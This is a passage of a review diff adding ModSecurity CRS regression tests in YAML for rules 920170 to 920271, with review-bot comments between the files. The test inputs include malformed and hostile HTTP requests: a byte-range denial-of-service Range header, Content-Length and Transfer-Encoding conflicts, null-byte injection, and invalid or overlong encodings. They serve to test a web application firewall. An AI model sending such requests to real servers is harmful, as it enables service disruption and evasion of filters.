data: "hi=test\r\n"
stop_magic: true
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
# GET request with content length 0 and no data.
test_title: 920170-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: ""
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
test_title: 920170-7
desc: GET or HEAD Request with Body Content (920170) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
log_contains: id "920170"
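Review bot: Test 920170-5 sends a GET with `Content-Length: "0"` followed by body data and asserts `no_log_contains`, while its own `User-Agent` value says `# Possibly shouldn't pass`, so the suite pins as expected a result the author doubted. A declared length that disagrees with the bytes actually sent is a case where the WAF and the backend may frame the request differently, so the expectation needs a `desc` explaining why the rule staying silent is correct, or the test should be marked as a known gap. The test numbering also skips 920170-4 without comment.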


@@ -0,0 +1,90 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920180.yaml"
description: "Description"
tests:
-
test_title: 920180-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
stop_magic: true
uri: "/"
output:
log_contains: id "920180"
-
test_title: 920180-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920180"
-
test_title: 920180-3
desc: POST request missing Content-Length Header (920180) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920180"
-
test_title: 920180-4
desc: Ignore check of CT header if protocol is HTTP/2
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/2.0
output:
no_log_contains: id "920180"
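Review bot: Tests 920180-1 and 920180-2 send the same request and differ only in `stop_magic: true`, yet expect opposite results, and nothing in the file explains why. If `stop_magic` suppresses FTW's automatic Content-Length header, as it appears to, a comment on test 1 such as `# stop_magic: FTW adds no Content-Length, so 920180 must fire` would make the pair readable. The `desc` of 920180-4 says "CT header", but test 920180-3 and the rule under test concern Content-Length, so this is probably a typo for CL. `description: "Description"` in `meta` is still the placeholder.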


@@ -0,0 +1,35 @@
---
meta:
author: "fgsch"
enabled: true
name: "920181.yaml"
description: "Description"
tests:
-
test_title: 920181-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 7
Content-Type: "application/x-www-form-urlencoded"
Transfer-Encoding: "chunked"
User-Agent: "ModSecurity CRS 3 Tests"
data:
- "7"
- "foo=bar"
- "0"
- ""
- ""
stop_magic: true
output:
# Apache unsets the Content-Length header if
# Transfer-Encoding is found!
no_log_contains: id "920181"
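Review bot: The expectation `no_log_contains: id "920181"` is justified in the comment by Apache dropping Content-Length when Transfer-Encoding is present, but the compose file in this commit also defines an nginx target, where that may not hold. As written, the one request that carries both headers is only asserted not to trigger the rule, so there is no positive test for 920181. A `desc` stating that the result is Apache-specific would help, with a separate expectation added for other targets once their behaviour is confirmed. `Content-Length: 7` is also the only unquoted header value in the file; `Content-Length: "7"` would match the others and keep it a string.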


@@ -0,0 +1,48 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920190.yaml"
description: "Description"
tests:
-
test_title: 920190-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "0-1"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920190"
-
test_title: 920190-2
desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions'
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920190"


@@ -0,0 +1,170 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920200.yaml"
description: "Description"
tests:
-
test_title: 920200-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60"
output:
log_contains: "id \"920200\""
-
# Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php
test_title: 920200-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11"
output:
log_contains: "id \"920200\""
-
test_title: 920200-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50"
output:
no_log_contains: "id \"920200\""
-
test_title: 920200-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=-10,-, 21-30,31-40,41-50,51-500,"
output:
log_contains: "id \"920200\""
-
test_title: 920200-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500"
output:
log_contains: "id \"920200\""
-
test_title: 920200-6
desc: 'Range: Too many fields (920200) from old modsec regressions'
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920200"
-
test_title: 920200-7
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
no_log_contains: id "920200"
-
test_title: 920200-8
desc: "This should FAIL with rule 920200 (PL2)"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
log_contains: id "920200"
-
test_title: 920200-9
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"
-
test_title: 920200-10
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"
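Review bot: Tests 920200-8 and 920200-9 send the same six-range `Range` header and differ only in `uri` (`/index.html` versus `/index.pdf`), but their `desc` fields say only that the case should FAIL or PASS, so the file never states why the PDF request is expected to stay silent. A comment above 920200-9 such as `# .pdf targets are not matched by 920200; long range lists on PDFs are covered by 920201/920202` would document that, assuming this is the rule's intent (the rule is not shown here). Tests 920200-4 and 920200-5 also carry a `#FP` marker inside the User-Agent string while expecting `log_contains`; a YAML comment is a clearer place for that remark.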


@@ -0,0 +1,24 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920201.yaml"
description: "Tests for 920201"
tests:
-
test_title: 920201-1
desc: This should FAIL with rule 920201 (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920201"
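Review bot: 920201.yaml holds a single positive case (63 ranges on `/index.pdf`) and nothing that shows where rule 920201 stops matching, so a rule change that made it fire on every PDF range request would still pass this file. A second case with a short list on the same URI, e.g. `Range: "bytes=10-11, 20-21"` with `no_log_contains: id "920201"`, would pin the other side. 920202.yaml has the same gap with its one six-range case.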


@@ -0,0 +1,24 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920202.yaml"
description: "Tests for 920202"
tests:
-
test_title: 920202-1
desc: This should FAIL with rule 920202 (PL4)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920202"


@@ -0,0 +1,125 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920210.yaml"
description: "Tests that trigger rule 920210"
tests:
-
test_title: 920210-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive"
output:
no_log_contains: "id \"920210\""
-
test_title: 920210-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,keep-alive"
output:
log_contains: "id \"920210\""
-
test_title: 920210-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,close"
output:
log_contains: "id \"920210\""
-
test_title: 920210-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "close,close"
output:
log_contains: "id \"920210\""
-
test_title: 920210-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "User-Agent"
output:
no_log_contains: "id \"920210\""
-
test_title: 920210-6
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: keep-alive, keep-alive
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"
-
test_title: 920210-7
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close, close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"


@@ -0,0 +1,82 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920220.yaml"
description: "Tests to trigger rule 920220"
tests:
-
# This gets a percent but not a number after, invalid
test_title: 920220-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=%w20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
-
# We have a valid percent encoding here
test_title: 920220-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=xyz%20%99"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
-
# url encoding includes spaces as plusses, this is valid
test_title: 920220-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=This+is+a+test"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
-
# testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
-
# testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%1G"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""


@@ -0,0 +1,47 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920230.yaml"
description: "Description"
tests:
-
# From old modsec regression tests
test_title: 920230-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920230\""
-
# From old modsec regression tests
test_title: 920230-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
no_log_contains: "id \"920230\""


@@ -0,0 +1,136 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920240.yaml"
description: "Description"
tests:
-
test_title: 920240-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 11
data: "x=new %w20$"
stop_magic: true
output:
log_contains: "id \"920240\""
-
test_title: 920240-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN This should Trigger"
Host: "localhost%00"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 10
data: "x=new %20$"
stop_magic: true
output:
no_log_contains: "id \"920240\""
-
test_title: 920240-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "param=value"
output:
no_log_contains: "id \"920240\""
-
# We have a valid percent encoding here
test_title: 920240-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "text/xml"
data:
- "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">"
- " <SOAP-ENV:Body>"
- " <xkms:StatusRequest xmlns:xkms=\"http://www.w3.org/2002/03/xkms#\" Id=\"_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659\" ResponseId=\"_c1c36b3f-f962-4aea-bfbd-07ed58468c9b\" Service=\"http://www.soapclient.com/xml/xkms2\">"
- " <xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>"
- " <xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith>"
- " </xkms:StatusRequest>"
- " </SOAP-ENV:Body>"
- "</SOAP-ENV:Envelope>"
output:
no_log_contains: "id \"920240\""
-
# test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "9"
data: "param=%1G"
stop_magic: true
output:
log_contains: "id \"920240\""
-
# test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
output:
log_contains: "id \"920240\""
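Review bot: The comment above 920240-4, `# We have a valid percent encoding here`, does not match its payload: the XML body contains `%1G`, which is not a valid percent escape. The `no_log_contains` expectation presumably holds because the body is sent as `text/xml` rather than `application/x-www-form-urlencoded`, so the comment should say so, e.g. `# invalid escape inside a text/xml body; 920240 is expected to ignore non-urlencoded bodies` (to be confirmed against the rule, which is not shown here). Test 920240-2 records its intent only inside the User-Agent string (`#FN This should Trigger`) while also sending `Host: "localhost%00"`; a comment next to its `no_log_contains` would say whether the expectation documents a known gap or the desired behaviour.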


@@ -0,0 +1,68 @@
---
meta:
author: "csanders-git"
enabled: false
name: "920250.yaml"
description: "Description"
tests:
-
# crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set
# Taken from existing modsec regression
test_title: 920250-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0%af"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
-
# Taken from existing modsec regression
test_title: 920250-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
-
# Taken from existing modsec regression
test_title: 920250-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%F5%80%BF%BF"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
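Review bot: With `enabled: false` this whole file is skipped, so the overlong and truncated UTF-8 cases (`%c0%af`, `%c0`, `%F5%80%BF%BF`) get no regression coverage, and the reason is given only in a comment attached to test 920250-1 rather than next to the flag. Moving it beside the flag, e.g. `# disabled: needs CRS_VALIDATE_UTF8_ENCODING set in crs-setup.conf`, would match 920360.yaml, 920370.yaml and 920380.yaml, which annotate their `enabled: false` directly. If the test environment can be started with those settings, running the four disabled files in a separate job would close the gap; whether the harness supports that is not visible here.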


@@ -0,0 +1,56 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920260.yaml"
description: "Description"
tests:
-
test_title: 920260-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%uff0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920260\""
-
test_title: 920260-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%u0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920260\""
-
# Test taken from existing modsec regression
test_title: 920260-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%uFF01"
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920260\""


@@ -0,0 +1,143 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920270.yaml"
description: "Description"
tests:
-
test_title: 920270-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
-
test_title: 920270-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
-
test_title: 920270-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
-
# This causes apache to error before it gets to CRS. Therefore
# we'll mark this as a status 400 now until the FTW OR output is added
test_title: 920270-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%00"
output:
status: [403, 400]
# log_contains: "id \"920270\""
-
test_title: 920270-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Referer: "anything%00"
output:
log_contains: "id \"920270\""
-
test_title: 920270-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%40=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
-
test_title: 920270-7
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
-
test_title: 920270-8
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
-
# Test converted from old tests
test_title: 920270-9
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920270\""
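Review bot: Test 920270-3 is identical to 920270-1 (same `uri: "/?test%00=test1"`, same headers, same expectation), and 920270-8 is identical to 920270-7, so two of the nine cases add no coverage. If they were meant to place the encoded byte somewhere else in the request, the inputs need to differ; otherwise they can be dropped. None of the cases has a `desc`, which is where that intent would normally be recorded.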


@@ -0,0 +1,92 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920271.yaml"
description: "Description"
tests:
-
test_title: 920271-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%127"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
-
test_title: 920271-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%03"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
-
test_title: 920271-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
-
test_title: 920271-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: hi%13=bye
output:
log_contains: "id \"920271\""
-
test_title: 920271-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%20index.html?test=test1"
headers:
